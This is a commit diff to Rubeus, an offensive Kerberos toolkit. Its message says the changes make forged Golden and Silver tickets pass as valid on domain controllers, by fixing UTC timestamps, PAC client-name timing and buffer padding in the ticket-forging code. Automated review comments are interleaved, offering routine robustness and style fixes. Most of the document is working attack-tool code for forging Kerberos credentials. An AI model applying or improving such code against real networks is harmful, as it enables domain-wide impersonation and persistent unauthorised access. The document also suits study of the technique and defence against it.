Golden/Silver tickets now pass as valid by DCs :)
CCob committed May 28, 2021
1 parent 5824610 commit 20cd8f1
Showing 6 changed files with 36 additions and 35 deletions.
8 changes: 4 additions & 4 deletions Rubeus/lib/ForgeTicket.cs
Expand Up @@ -129,15 +129,15 @@ public static void ForgeTicket(string user, string sname, string keyString, Inte
kvi.BadPasswordCount = short.Parse(u.Properties["badpwdcount"][0].ToString());
if (Int64.Parse(u.Properties["lastlogon"][0].ToString()) != 0)
{
kvi.LogonTime = new Ndr._FILETIME(DateTime.FromFileTime((long)u.Properties["lastlogon"][0]));
kvi.LogonTime = new Ndr._FILETIME(DateTime.FromFileTimeUtc((long)u.Properties["lastlogon"][0]));
}
if (Int64.Parse(u.Properties["lastlogoff"][0].ToString()) != 0)
{
kvi.LogoffTime = new Ndr._FILETIME(DateTime.FromFileTime((long)u.Properties["lastlogoff"][0]));
kvi.LogoffTime = new Ndr._FILETIME(DateTime.FromFileTimeUtc((long)u.Properties["lastlogoff"][0]));
}
if (Int64.Parse(u.Properties["pwdlastset"][0].ToString()) != 0)
{
kvi.PasswordLastSet = new Ndr._FILETIME(DateTime.FromFileTime((long)u.Properties["pwdlastset"][0]));
kvi.PasswordLastSet = new Ndr._FILETIME(DateTime.FromFileTimeUtc((long)u.Properties["pwdlastset"][0]));
}
kvi.PrimaryGroupId = (int)u.Properties["primarygroupid"][0];
kvi.UserId = Int32.Parse(objectSid.Substring(objectSid.LastIndexOf('-')+1));
Expand Down Expand Up @@ -292,7 +292,7 @@ public static void ForgeTicket(string user, string sname, string keyString, Inte
return;
}

EncTicketPart decTicketPart = new EncTicketPart(randKeyBytes, etype, domain.ToUpper(), user, flags);
EncTicketPart decTicketPart = new EncTicketPart(randKeyBytes, etype, domain.ToUpper(), user, flags, cn.ClientId);

// generate clear signatures
svrSigData.Signature = new byte[sigLength];
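Review bot: Each of the three timestamp blocks in the first hunk reads the directory value twice — once through `Int64.Parse(...ToString())` for the zero check and again through the unboxing cast `(long)u.Properties[...][0]` for the conversion — and the two reads can disagree: the parse accepts any object whose string form is numeric, while the cast throws InvalidCastException unless the value is a boxed `long`. Reading it once into a local removes the mismatch, e.g. `long lastLogon = Int64.Parse(u.Properties["lastlogon"][0].ToString());` followed by `if (lastLogon != 0) { kvi.LogonTime = new Ndr._FILETIME(DateTime.FromFileTimeUtc(lastLogon)); }`, and likewise for lastlogoff and pwdlastset. `DateTime.FromFileTimeUtc` also throws ArgumentOutOfRangeException for a negative value, so a `> 0` check rather than `!= 0` is the safer guard for attributes read from the directory. ForgeTicket's body continues outside both hunks.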
39 changes: 17 additions & 22 deletions Rubeus/lib/LSA.cs
Expand Up @@ -529,16 +529,11 @@ public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displa
// extractKerberoastHash - extract out the rc4_hmac "kerberoastable" hash, if possible
// nowrap - don't wrap base64 ticket output

var dateFormat = "dd/MM/yyyy HH:mm:ss";
var userName = string.Join("@", cred.enc_part.ticket_info[0].pname.name_string.ToArray());
var domainName = cred.enc_part.ticket_info[0].prealm;
var sname = string.Join("/", cred.enc_part.ticket_info[0].sname.name_string.ToArray());
var srealm = cred.enc_part.ticket_info[0].srealm;
var keyType = String.Format("{0}", (Interop.KERB_ETYPE)cred.enc_part.ticket_info[0].key.keytype);
var b64Key = Convert.ToBase64String(cred.enc_part.ticket_info[0].key.keyvalue);
var startTime = TimeZone.CurrentTimeZone.ToLocalTime(cred.enc_part.ticket_info[0].starttime);
var endTime = TimeZone.CurrentTimeZone.ToLocalTime(cred.enc_part.ticket_info[0].endtime);
var renewTill = TimeZone.CurrentTimeZone.ToLocalTime(cred.enc_part.ticket_info[0].renew_till);
var flags = cred.enc_part.ticket_info[0].flags;
var b64Key = Convert.ToBase64String(cred.enc_part.ticket_info[0].key.keyvalue);
var base64ticket = Convert.ToBase64String(cred.Encode().Encode());
string indent = new string(' ', indentLevel);
string serviceName = sname.Split('/')[0];
Expand All @@ -547,11 +542,11 @@ public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displa
if (displayTGT)
{
// abbreviated display used for monitor/etc.
Console.WriteLine("{0}User : {1}@{2}", indent, userName, domainName);
Console.WriteLine("{0}StartTime : {1}", indent, startTime);
Console.WriteLine("{0}EndTime : {1}", indent, endTime);
Console.WriteLine("{0}RenewTill : {1}", indent, renewTill);
Console.WriteLine("{0}Flags : {1}", indent, flags);
Console.WriteLine("{0}User : {1}@{2}", indent, userName, cred.enc_part.ticket_info[0].prealm);
Console.WriteLine("{0}StartTime : {1}", indent, cred.enc_part.ticket_info[0].starttime.ToLocalTime().ToString(dateFormat));
Console.WriteLine("{0}EndTime : {1}", indent, cred.enc_part.ticket_info[0].endtime.ToLocalTime().ToString(dateFormat));
Console.WriteLine("{0}RenewTill : {1}", indent, cred.enc_part.ticket_info[0].renew_till.ToLocalTime().ToString(dateFormat));
Console.WriteLine("{0}Flags : {1}", indent, cred.enc_part.ticket_info[0].flags);
Console.WriteLine("{0}Base64EncodedTicket :\r\n", indent);

if (Rubeus.Program.wrapTickets)
Expand All @@ -570,13 +565,13 @@ public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displa
{
// full display with session key
Console.WriteLine("\r\n{0}ServiceName : {1}", indent, sname);
Console.WriteLine("{0}ServiceRealm : {1}", indent, srealm);
Console.WriteLine("{0}ServiceRealm : {1}", indent, cred.enc_part.ticket_info[0].srealm);
Console.WriteLine("{0}UserName : {1}", indent, userName);
Console.WriteLine("{0}UserRealm : {1}", indent, domainName);
Console.WriteLine("{0}StartTime : {1}", indent, startTime);
Console.WriteLine("{0}EndTime : {1}", indent, endTime);
Console.WriteLine("{0}RenewTill : {1}", indent, renewTill);
Console.WriteLine("{0}Flags : {1}", indent, flags);
Console.WriteLine("{0}UserRealm : {1}", indent, cred.enc_part.ticket_info[0].prealm);
Console.WriteLine("{0}StartTime : {1}", indent, cred.enc_part.ticket_info[0].starttime.ToLocalTime());
Console.WriteLine("{0}EndTime : {1}", indent, cred.enc_part.ticket_info[0].endtime.ToLocalTime());
Console.WriteLine("{0}RenewTill : {1}", indent, cred.enc_part.ticket_info[0].renew_till.ToLocalTime());
Console.WriteLine("{0}Flags : {1}", indent, cred.enc_part.ticket_info[0].flags);
Console.WriteLine("{0}KeyType : {1}", indent, keyType);
Console.WriteLine("{0}Base64(key) : {1}", indent, b64Key);

Expand Down Expand Up @@ -620,7 +615,7 @@ public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displa
{
if (String.IsNullOrEmpty(serviceDomain))
{
serviceDomain = domainName;
serviceDomain = cred.enc_part.ticket_info[0].prealm;
}
if (serviceUser.EndsWith("$"))
{
Expand Down Expand Up @@ -655,7 +650,7 @@ public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displa
if (pacInfoBuffer is ClientName cn)
{
Console.WriteLine("{0} ClientName :", indent);
Console.WriteLine("{0} Client Id : {1}", indent, cn.ClientId);
Console.WriteLine("{0} Client Id : {1}", indent, cn.ClientId.ToLocalTime().ToString(dateFormat));
Console.WriteLine("{0} Client Name : {1}", indent, cn.Name);
}
else if (pacInfoBuffer is UpnDns upnDns)
Expand Down Expand Up @@ -704,12 +699,12 @@ public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displa
Console.WriteLine("{0} UserId : {1}", indent, li.KerbValidationInfo.UserId);
Console.WriteLine("{0} PrimaryGroupId : {1}", indent, li.KerbValidationInfo.PrimaryGroupId);
Console.WriteLine("{0} GroupCount : {1}", indent, li.KerbValidationInfo.GroupCount);
Console.WriteLine("{0} Groups : {1}", indent, li.KerbValidationInfo.GroupIds.GetValue().Select(g => g.RelativeId.ToString()).Aggregate((cur, next) => cur + "," + next));
Console.WriteLine("{0} Groups : {1}", indent, li.KerbValidationInfo.GroupIds?.GetValue().Select(g => g.RelativeId.ToString()).Aggregate((cur, next) => cur + "," + next));
Console.WriteLine("{0} UserFlags : ({1}) {2}", indent, li.KerbValidationInfo.UserFlags, (Interop.PacUserFlags)li.KerbValidationInfo.UserFlags);
Console.WriteLine("{0} UserSessionKey : {1}", indent, Helpers.ByteArrayToString((byte[])(Array)li.KerbValidationInfo.UserSessionKey.data[0].data));
Console.WriteLine("{0} LogonServer : {1}", indent, li.KerbValidationInfo.LogonServer);
Console.WriteLine("{0} LogonDomainName : {1}", indent, li.KerbValidationInfo.LogonDomainName);
Console.WriteLine("{0} LogonDomainId : {1}", indent, li.KerbValidationInfo.LogonDomainId.GetValue());
Console.WriteLine("{0} LogonDomainId : {1}", indent, li.KerbValidationInfo.LogonDomainId?.GetValue());
Console.WriteLine("{0} UserAccountControl : ({1}) {2}", indent, li.KerbValidationInfo.UserAccountControl, (Interop.PacUserAccountControl)li.KerbValidationInfo.UserAccountControl);
Console.WriteLine("{0} ExtraSIDCount : {1}", indent, li.KerbValidationInfo.SidCount);
if (li.KerbValidationInfo.SidCount > 0)
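Review bot: The null-conditional added on `li.KerbValidationInfo.GroupIds?.GetValue()...` guards only a null GroupIds; `Aggregate` without a seed still throws InvalidOperationException when the projected sequence is empty (e.g. GetValue() returning an empty array for a GroupCount of 0), so the display would abort instead of printing an empty group list. `string.Join(",", li.KerbValidationInfo.GroupIds?.GetValue().Select(g => g.RelativeId.ToString()) ?? Enumerable.Empty<string>())` handles both the null and the empty case with the same output for non-empty input. Separately, the two display branches now format times differently: the displayTGT branch applies `.ToLocalTime().ToString(dateFormat)` while the full display's StartTime/EndTime/RenewTill lines in the third hunk print `.ToLocalTime()` with the culture default, which looks unintentional given that `dateFormat` was introduced for exactly this. DisplayTicket's body continues outside these hunks.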
6 changes: 3 additions & 3 deletions Rubeus/lib/krb_structures/EncTicketPart.cs
Expand Up @@ -24,14 +24,14 @@ public class EncTicketPart
// authorization-data[10] AuthorizationData OPTIONAL
//}

public EncTicketPart(byte[] sessionKey, Interop.KERB_ETYPE etype, string domain, string user, Interop.TicketFlags ticketFlags)
public EncTicketPart(byte[] sessionKey, Interop.KERB_ETYPE etype, string domain, string user, Interop.TicketFlags ticketFlags, DateTime startTime)
{
// flags
flags = ticketFlags;

// default times
authtime = DateTime.UtcNow;
starttime = DateTime.UtcNow;
authtime = startTime;
starttime = startTime;
endtime = starttime.AddHours(10);
renew_till = starttime.AddDays(7);

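Review bot: The constructor change replaces the five-argument signature rather than adding to it, so any other caller that still passes five arguments no longer compiles; since the old behaviour was simply `DateTime.UtcNow`, a forwarding overload keeps both: `public EncTicketPart(byte[] sessionKey, Interop.KERB_ETYPE etype, string domain, string user, Interop.TicketFlags ticketFlags) : this(sessionKey, etype, domain, user, ticketFlags, DateTime.UtcNow) { }`. The new `startTime` parameter also deserves a `<param>` doc comment stating that it becomes both authtime and starttime, that endtime and renew_till are derived from it (+10 hours, +7 days), and that a UTC value is expected given the rest of this commit's move to the `*Utc` conversions — nothing here checks `startTime.Kind`, so a Local or Unspecified value would be carried through unchanged. The remainder of the constructor body is outside the hunk.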
11 changes: 7 additions & 4 deletions Rubeus/lib/krb_structures/pac/ClientName.cs
Expand Up @@ -6,8 +6,11 @@

namespace Rubeus.Kerberos.PAC {
public class ClientName : PacInfoBuffer {
public ClientName(DateTime clientId, string name) {
ClientId = clientId;
public ClientName(DateTime clientId, string name) {
ClientId = new DateTime(
clientId.Ticks - (clientId.Ticks % TimeSpan.TicksPerSecond),
clientId.Kind
);
NameLength = (short)(name.Length * 2);
Name = name;
Type = PacInfoBufferType.ClientName;
Expand All @@ -22,14 +25,14 @@ public ClientName(byte[] data) : base(data, PacInfoBufferType.ClientName) {
public string Name { get; set; }

protected override void Decode(byte[] data) {
ClientId = DateTime.FromFileTime(br.ReadInt64());
ClientId = DateTime.FromFileTimeUtc(br.ReadInt64());
NameLength = br.ReadInt16();
Name = Encoding.Unicode.GetString(br.ReadBytes(NameLength));
}

public override byte[] Encode() {
BinaryWriter bw = new BinaryWriter(new MemoryStream());
bw.Write(ClientId.ToFileTime());
bw.Write(ClientId.ToFileTimeUtc());
bw.Write(NameLength);
bw.Write(Encoding.Unicode.GetBytes(Name));
return ((MemoryStream)bw.BaseStream).ToArray();
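Review bot: `Decode` now calls `DateTime.FromFileTimeUtc(br.ReadInt64())` on a value read straight from the PAC buffer, which throws ArgumentOutOfRangeException for a negative or beyond-year-9999 FILETIME, so a malformed or unusual buffer aborts ticket parsing instead of yielding a readable structure; a range check before the conversion (or a try/catch that leaves ClientId at its default and keeps the raw value for display) would make the parser more robust. In the constructor, the truncation to whole seconds carries no comment explaining why; something like `// drop sub-second ticks: ClientId is meant to match the ticket's authtime, which is encoded at one-second resolution` captures the apparent intent — that reason is inferred from the commit and should be confirmed. `new DateTime(clientId.Ticks / TimeSpan.TicksPerSecond * TimeSpan.TicksPerSecond, clientId.Kind)` is an equivalent and arguably clearer form of the same truncation. Both hunks sit inside the ClientName class, whose remaining members are outside the view.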
4 changes: 2 additions & 2 deletions Rubeus/lib/krb_structures/pac/Ndr/Kerberos_PAC.cs
Expand Up @@ -464,14 +464,14 @@ public _FILETIME(uint LowDateTime, uint HighDateTime) {
this.HighDateTime = HighDateTime;
}
public _FILETIME(DateTime dateTime) {
var fileTime = dateTime.ToFileTime();
var fileTime = dateTime.ToFileTimeUtc();
LowDateTime = (uint)(fileTime & 0xffffffff);
HighDateTime = (uint)( (fileTime >> 32) & 0xffffffff);
}

public override string ToString() {
if (LowDateTime != 0xffffffff && HighDateTime != 0x7fffffff) {
return DateTime.FromFileTime((long)LowDateTime | ((long)HighDateTime << 32)).ToString();
return DateTime.FromFileTimeUtc((long)LowDateTime | ((long)HighDateTime << 32)).ToString("dd/MM/yyyy HH:mm:ss.fff");
} else {
return "";
}
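Review bot: `ToString` now converts the raw FILETIME with `DateTime.FromFileTimeUtc`, which throws ArgumentOutOfRangeException for any value above `DateTime.MaxValue.ToFileTimeUtc()`; the guard on the line above only excludes the 0x7fffffff:ffffffff sentinel (and, because it tests each half with `&&`, any value where either half matches), so other out-of-range values decoded from a ticket still throw from a ToString call. Combining the halves once into a `long`, comparing it against `DateTime.MaxValue.ToFileTimeUtc()` and returning "" (or the raw hex) when out of range would keep ToString non-throwing. The format string `"dd/MM/yyyy HH:mm:ss.fff"` is also culture-sensitive — '/' is replaced by the current culture's date separator — so `ToString("dd/MM/yyyy HH:mm:ss.fff", CultureInfo.InvariantCulture)` (with `using System.Globalization;`) gives stable output; the same applies to the `dateFormat` uses in LSA.cs. The enclosing _FILETIME type continues outside the hunk.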
3 changes: 3 additions & 0 deletions Rubeus/lib/krb_structures/pac/PacCredentialInfo.cs
Expand Up @@ -35,6 +35,9 @@ public override byte[] Encode() {
var encData = Crypto.KerberosEncrypt(EncryptionType, Interop.KRB_KEY_USAGE_KRB_NON_KERB_SALT, key, plainText);
bw.Write(encData);

long alignment = ((bw.BaseStream.Position + 7) / 8) * 8;
bw.BaseStream.SetLength(alignment);

return ((MemoryStream)bw.BaseStream).ToArray();
}

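Review bot: The added padding lines compute the padded length but name it `alignment`, and nothing says why the stream is extended; `long paddedLength = ((bw.BaseStream.Position + 7) / 8) * 8;` together with a comment such as `// pad the buffer to an 8-byte boundary; MemoryStream.SetLength zero-fills the added bytes` would make the intent readable. This also relies on Position equalling Length at that point — true after the sequential writes above — because SetLength would truncate any data beyond Position otherwise, so a note to that effect (or an explicit `bw.Write(new byte[paddedLength - bw.BaseStream.Position])`) would make the assumption visible. Encode's opening and its remaining lines are outside the hunk.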